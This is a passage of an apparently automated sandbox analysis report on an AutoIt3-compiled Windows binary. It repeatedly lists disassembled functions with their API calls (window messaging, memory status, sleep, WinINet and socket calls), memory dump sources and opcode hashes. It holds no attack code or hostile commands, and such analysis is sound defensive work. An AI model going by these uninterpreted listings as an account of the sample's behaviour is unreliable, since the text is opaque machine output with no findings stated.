                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ContainedObject
                                                                                                                                                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                                                                                                                                                                      • Opcode ID: c756c71c72ed7f29c399c6c1f176ae48986904c0bcd2968a778b239266f69698
                                                                                                                                                                                                                                                      • Instruction ID: acff4c390859686888165562a328cf42b4e93819dcd3595085448c2fe0132a2f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c756c71c72ed7f29c399c6c1f176ae48986904c0bcd2968a778b239266f69698
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF914570604605AFDB24CF64C884F6ABBFABF49714F10856EF94ADB291DB71E841CB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00EDBCDA
                                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00EDBCF3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 2c0d3d9e382c6dc8f512af5e28505653fcc1172c92e4fc6c4e27724f5594846c
                                                                                                                                                                                                                                                      • Instruction ID: 4a0804ea233e3a3f87c89e4276766950dd81c9bd702015f993e993265f50e349
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c0d3d9e382c6dc8f512af5e28505653fcc1172c92e4fc6c4e27724f5594846c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 795147714187489BE320AF14DC86BAFBBE8FFE4354F41484EF2C8511A2DB7089A98752
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC44ED: __fread_nolock.LIBCMT ref: 00EC450B
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0C65D
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0C670
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                                                                                                                                                      • Opcode ID: 7c7799a65eff1d328566c1b6ed22f49c9cccf2a815b011972e930f3bf4545770
                                                                                                                                                                                                                                                      • Instruction ID: f737fcb63039f33869de119b7da4d22c3fb9f12d8a7605792a72bc8fd9afd5ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c7799a65eff1d328566c1b6ed22f49c9cccf2a815b011972e930f3bf4545770
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC41E572A0020ABADF209BA48C41FEF77F9AF49710F001069F615FB1C1D6729A05EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F2A85A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F2A86F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                      • Opcode ID: ab5f181b2697c796df533cd62993ba1718d83462db9a4a11ba327b4db05913d9
                                                                                                                                                                                                                                                      • Instruction ID: 9b6e5d7c678b769373f92147c3d3fb992c725609707d2802105ab82e3718a967
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab5f181b2697c796df533cd62993ba1718d83462db9a4a11ba327b4db05913d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6411875E013199FDB14CFA8D880BEA7BB9FB08310F14016AE905EB381D770A942DFA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F15190
                                                                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00F151C6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                                                                                                                                                      • Opcode ID: 58f85502fc31233c67f1451b58395001896ba83fd48b147a441273221e547165
                                                                                                                                                                                                                                                      • Instruction ID: 5deeac69f1cce4fb23918c4cb9d7e33e6f76cbdde5517732a3f681e140c859fd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58f85502fc31233c67f1451b58395001896ba83fd48b147a441273221e547165
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5313872C00109EBCF15EFA5CD85EEEBFB9FF54710F100019E809B6166DA31AA46DBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00F2980E
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F2984A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                      • Opcode ID: d421c77db5104ba0c20e0d84906ce07f36dbe78d249898f47cd648498b1283a4
                                                                                                                                                                                                                                                      • Instruction ID: 26b1e7d5cf9c5d576b6cee84004c507c9fba7a2500c4e6acfff1fc2f3c41ac94
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d421c77db5104ba0c20e0d84906ce07f36dbe78d249898f47cd648498b1283a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B31B171510214AEEB109F74DC80BFB73A9FF59760F14861AF8A9D7190CB70AC81E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F051C6
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F05201
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 1d47140bcdf2c77f95099aa270a40efe1e2e39176e2808881cb92dfb1941fc29
                                                                                                                                                                                                                                                      • Instruction ID: f3aa39bfed493db944d6d6c3df3e5820910e0282d29af873036a1ba29642133f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d47140bcdf2c77f95099aa270a40efe1e2e39176e2808881cb92dfb1941fc29
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09318F32A00604EBEB24CF99D945BAFBBF8AF45B60F144419E995A61E0D7F09A44FF10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __snwprintf
                                                                                                                                                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                                                      • API String ID: 2391506597-2584243854
                                                                                                                                                                                                                                                      • Opcode ID: da8f1fc5e2ba457f17f656f15d1ef70c059b769a83d6d3fa5c2c98a95cab3b19
                                                                                                                                                                                                                                                      • Instruction ID: 19d173ab10b7d5d42fc7cbc35ede16def0381ee3148426ec66c9513c2e05c137
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8f1fc5e2ba457f17f656f15d1ef70c059b769a83d6d3fa5c2c98a95cab3b19
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E217F71600218AECF10EF64C981FED73B5AF55300F054459F505FB142DB71EA86EBA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F2945C
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F29467
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                      • Opcode ID: aa4dd58041b91716cdda7bb367a67c90cf34a2a39a17dfcc38fc3f84e3e2b1ff
                                                                                                                                                                                                                                                      • Instruction ID: 297c73e91c8fca72776a1989a722e1aefe7c805bea3fb6e278e1c9b2b6122e4d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa4dd58041b91716cdda7bb367a67c90cf34a2a39a17dfcc38fc3f84e3e2b1ff
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5119071704218AFEF15EE54EC80EBB376EEB483B4F104129F95997290D6B19C52A760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: GetStockObject.GDI32(00000011), ref: 00EDD1CE
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00F29968
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00F29982
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                      • Opcode ID: a3b6161dc207b9f2307e6af6a6e9e62091c29c2e14d6f5d95bdf0a85ca763dc4
                                                                                                                                                                                                                                                      • Instruction ID: 4d7f341f9b2a72a6112c550b2b844171ac9fd2d040a77088f5361aed8845b6ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3b6161dc207b9f2307e6af6a6e9e62091c29c2e14d6f5d95bdf0a85ca763dc4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10116A72510219AFDB04DFB8DC45AFA7BA8FB08314F054619FD55E3250E774E851EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00F29699
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F296A8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                      • Opcode ID: daa311396ee08077968cf1e8cf7d7f2568674e26d99e51cbcbbb59145175f780
                                                                                                                                                                                                                                                      • Instruction ID: 7d2e3b3edef04c167ffb4d8910f0751f4e6da096e027c71691fcbbb94ae40a2b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daa311396ee08077968cf1e8cf7d7f2568674e26d99e51cbcbbb59145175f780
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94118C71904118ABEB205FA4EC54EEB3BAAEB153B8F104714F965931E0C7B5DC51BB60
                                                                                                                                                                                                                                                      APIs
• _memset.LIBCMT ref: 00F052D5
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F052F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 5117e5871758fa0921d0497efe0e3e6daf14797cb335a1134ac169ab99956d08
• Instruction ID: f0124da8d9fd429399828b6987316d2a04a01284d91aa5e6549b3af607cafe45
• Opcode Fuzzy Hash: 5117e5871758fa0921d0497efe0e3e6daf14797cb335a1134ac169ab99956d08
• Instruction Fuzzy Hash: AE11D072D01618EBEB20DA98DD05BAE77B9AB05B60F140125E901E72D0D3F0AD09FF90
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F14DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F14E1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: e7f6f5fa8e72b71c10bd4e934e12d095f03a03551aed87768d42e2c298856cb4
• Instruction ID: 947c6b940d99a42ab9f84644b0fd4333ad1cd5eb8ba4c235cdfd3bf4f458c427
• Opcode Fuzzy Hash: e7f6f5fa8e72b71c10bd4e934e12d095f03a03551aed87768d42e2c298856cb4
• Instruction Fuzzy Hash: F211A071A01225BBDF298F61D888FFBFAA8FF56765F10822AF50556180D3706981E6E0
APIs
• inet_addr.WSOCK32(00000000), ref: 00F1A84E
• htons.WSOCK32(00000000), ref: 00F1A88B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f8509941a1459d6ed142f698b20b0c1c7cd85cc64b2ceb63b550263d231ae41
• Instruction ID: 9e198a99fcdc25a1f657d7db75cc1422107e0a878140b8cd40f30798c2b9435a
• Opcode Fuzzy Hash: 8f8509941a1459d6ed142f698b20b0c1c7cd85cc64b2ceb63b550263d231ae41
• Instruction Fuzzy Hash: 1C01F975600309ABCB109FA4C856FEDB364EF45330F208526F515A73D1D775E845E752
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EFB7EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
